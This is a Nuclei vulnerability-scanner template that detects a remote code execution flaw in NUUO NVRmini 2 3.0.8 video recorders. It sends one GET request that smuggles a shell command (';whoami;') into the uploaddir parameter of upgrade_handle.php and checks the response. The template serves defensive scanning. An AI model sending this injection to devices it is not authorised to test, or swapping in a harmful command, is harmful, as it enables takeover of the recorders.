nuclei-templates/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml

38 lines
1.1 KiB
YAML

id: nuuo-nvrmini2-rce
info:
name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
author: berkdusunur
severity: critical
description: |
NUUO NVRmini 2 3.0.8 is susceptible to remote code execution.
reference:
- https://www.exploit-db.com/exploits/45070
- https://github.com/berkdsnr/NUUO-NVRMINI-RCE
- https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: rce,nuuo,nvrmini,edb,packetstorm
http:
- method: GET
path:
- "{{BaseURL}}/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/upload_tmp_dir/"
- type: status
status:
- 200
# digest: 4a0a00473045022100813adbe278d433ce3fef4e8cdf3401967386a57128ef663900edf79205982a9202207f0864963392aecfa9b435c943e501b89be3a969f497be5f16ddaec3a194424d:922c64590222798bb761d5b6d8e72950